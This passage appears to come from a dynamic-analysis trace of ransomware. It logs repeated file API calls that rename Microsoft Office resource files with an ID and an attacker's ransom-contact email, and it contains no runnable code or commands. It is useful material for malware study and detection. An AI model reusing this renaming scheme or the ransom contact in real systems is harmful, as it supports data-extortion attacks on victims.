SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\FONTSCHM.INI.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\fontschm.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.155] CloseHandle (hObject=0x530) returned 1 [0176.156] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.156] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME01.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme01.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.156] CloseHandle (hObject=0x530) returned 1 [0176.157] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.158] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME02.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme02.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.158] CloseHandle (hObject=0x530) returned 1 [0176.159] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.159] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME03.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme03.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.159] CloseHandle (hObject=0x530) returned 1 [0176.160] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.160] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME04.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme04.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.160] CloseHandle (hObject=0x530) returned 1 [0176.161] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.161] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME05.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme05.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.162] CloseHandle (hObject=0x530) returned 1 [0176.162] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.162] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME06.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme06.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.163] CloseHandle (hObject=0x530) returned 1 [0176.163] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.163] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME07.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme07.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.164] CloseHandle (hObject=0x530) returned 1 [0176.165] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.165] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME08.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme08.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.165] CloseHandle (hObject=0x530) returned 1 [0176.166] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.166] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME09.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme09.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.166] CloseHandle (hObject=0x530) returned 1 [0176.167] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.167] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME10.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme10.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.167] CloseHandle (hObject=0x530) returned 1 [0176.168] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.168] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME11.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme11.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.168] CloseHandle (hObject=0x530) returned 1 [0176.169] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.169] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME12.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme12.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.169] CloseHandle (hObject=0x530) returned 1 [0176.170] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.170] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME13.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme13.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.282] CloseHandle (hObject=0x530) returned 1 [0176.367] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.367] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME42.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme42.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.367] CloseHandle (hObject=0x530) returned 1 [0176.368] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.368] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME43.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme43.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.368] CloseHandle (hObject=0x530) returned 1 [0176.369] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.369] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME44.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme44.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.369] CloseHandle (hObject=0x530) returned 1 [0176.370] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.370] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME45.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme45.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.370] CloseHandle (hObject=0x530) returned 1 [0176.371] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.371] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME46.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme46.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.371] CloseHandle (hObject=0x530) returned 1 [0176.373] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.373] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME47.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme47.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.373] CloseHandle (hObject=0x530) returned 1 [0176.374] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.374] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME48.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme48.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.374] CloseHandle (hObject=0x530) returned 1 [0176.375] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.375] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME49.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme49.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.376] CloseHandle (hObject=0x530) returned 1 [0176.376] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.377] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME50.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme50.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.377] CloseHandle (hObject=0x530) returned 1 [0176.378] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.378] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME51.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme51.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.379] CloseHandle (hObject=0x530) returned 1 [0176.380] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.380] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME52.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme52.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.380] CloseHandle (hObject=0x530) returned 1 [0176.382] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.382] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME53.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme53.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.382] CloseHandle (hObject=0x530) returned 1 [0176.383] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.383] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME54.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme54.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.384] CloseHandle (hObject=0x530) returned 1 [0176.384] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.384] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME55.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme55.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.385] CloseHandle (hObject=0x530) returned 1 [0176.388] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.388] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PAPERS.INI.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\papers.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.388] CloseHandle (hObject=0x530) returned 1 [0176.389] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.389] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR10F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir10f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.390] CloseHandle (hObject=0x530) returned 1 [0176.390] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.391] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR11F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir11f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.391] CloseHandle (hObject=0x530) returned 1 [0176.392] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.392] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR12F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir12f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.392] CloseHandle 